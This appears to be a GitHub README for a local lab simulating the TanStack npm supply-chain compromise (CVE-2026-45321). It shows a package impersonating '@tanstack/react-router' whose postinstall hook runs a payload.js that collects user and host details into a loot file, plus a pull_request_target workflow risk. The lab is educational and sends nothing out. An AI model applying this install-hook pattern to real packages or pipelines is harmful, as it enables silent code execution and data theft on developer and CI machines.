renewablehacking/CVE-2026-45321-Tanstack

GitHub: renewablehacking/CVE-2026-45321-Tanstack

Stars: 0 | Forks: 0

# Supply Chain Attack Simulation: CVE-2026-45321 (TanStack)

## Disclaimer

This project was created only for:

* cyber security learning,
* defensive security research,
* local lab simulation,
* understanding the concept of a supply chain attack.

Do not use this project for:

* attacking real systems,
* stealing credentials,
* malware deployment,
* unauthorized access,
* or any other illegal activity.

# Description

This lab simulates the basic concepts behind the incident:

* CVE-2026-45321
* TanStack npm Supply Chain Compromise
* GitHub Actions CI/CD Abuse
* npm Lifecycle Script Execution

The simulation runs locally and safely, without:

* real credential stealing,
* token exfiltration,
* or compromise of any third-party service.

# Lab Structure

```
lab/
├── fake-repo/          # Simulated target repository
├── attacker-package/   # Simulated malicious package
└── victim-project/     # Simulated victim
```

# How the Simulation Works

```
Attacker package
      ↓
npm install
      ↓
postinstall script runs
      ↓
payload.js is executed automatically
      ↓
Victim is hit by install-time execution
```

# Concepts Covered

* npm lifecycle hooks
* install-time arbitrary code execution
* supply chain attack
* CI/CD trust boundary
* malicious npm package
* postinstall abuse
* dependency compromise

# Installation

## 1. Clone the Repository

```shell
git clone https://github.com/renewablehacking/CVE-2026-45321-Tanstack.git
cd CVE-2026-45321-Tanstack
```

# Attacker Package Setup

## 2. Enter the Attacker Package Folder

```shell
cd attacker-package
```

## 3. Install Dependencies

```shell
npm install
```

## 4. Build the Package Tarball

```shell
npm pack
```

Result: `tanstack-react-router-1.169.5.tgz` (npm folds the `@tanstack/` scope into the tarball name).

# Victim Simulation

## 5. Enter the Victim Project

```shell
cd ../victim-project
```

## 6. Install the Malicious Package

```shell
npm install ../attacker-package/tanstack-react-router-1.169.5.tgz --foreground-scripts
```

`--foreground-scripts` only makes the lifecycle script's output visible in the terminal. npm 7 and later run the `postinstall` hook either way, with its output hidden, unless the install is run with `--ignore-scripts` (or `ignore-scripts=true` is set in `.npmrc`). That silent default is the whole point of the attack.

# Output

If it works, you will see:

```
=== MALICIOUS PAYLOAD EXECUTED ===
```

and the file `loot.txt` is created automatically. Because npm runs lifecycle scripts with the package's own folder as the working directory, the file lands in `victim-project/node_modules/@tanstack/react-router/loot.txt`, not in the victim project's root.

# Example payload.js

```javascript
const os = require('os');
const fs = require('fs');

console.log("=== MALICIOUS PAYLOAD EXECUTED ===");

// Harmless host fingerprint; a real installer would send this somewhere.
// process.env.USER is only set on Unix-like shells (Windows uses USERNAME).
const info = `
USER=${process.env.USER}
HOST=${os.hostname()}
PLATFORM=${os.platform()}
`;

console.log(info);

// Written relative to the working directory, which npm sets to the package folder.
fs.writeFileSync("loot.txt", info);
```

# Example package.json

```json
{
  "name": "@tanstack/react-router",
  "version": "1.169.5",
  "scripts": {
    "postinstall": "node payload.js"
  }
}
```

# CI/CD Simulation

This project can also be used to understand:

* GitHub Actions
* pull_request_target
* CI/CD privilege boundary
* dependency execution

Example workflow:

```yaml
name: CI
on:
  pull_request_target:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm install
```

Caveat: `pull_request_target` runs in the context of the base repository, with its secrets and a write-capable `GITHUB_TOKEN`. As written, `actions/checkout@v4` checks out the base branch, so `npm install` only executes hooks from dependencies the maintainers already trust. The workflow becomes a privilege escalation once it checks out the pull request head (for example `ref: ${{ github.event.pull_request.head.sha }}`) and runs `npm install` on it, because any lifecycle hook in a PR-controlled `package.json` then runs with the base repository's privileges. The GitHub Actions hardening guide in the references covers this pattern.

# Relationship to CVE-2026-45321

| Lab Simulation   | Real World                   |
| ---------------- | ---------------------------- |
| attacker-package | compromised TanStack package |
| payload.js       | malicious installer          |
| postinstall      | lifecycle hook abuse         |
| victim-project   | developer/CI victim          |
| fake-repo        | GitHub Actions pipeline      |

# References

* https://nvd.nist.gov/vuln/detail/CVE-2026-45321
* https://tanstack.com/blog/npm-supply-chain-compromise-postmortem
* https://docs.npmjs.com/cli/v10/using-npm/scripts
* https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions

# Educational Purpose Only

This lab was created to raise awareness of:

* supply chain security,
* dependency security,
* CI/CD security,
* and defensive security research.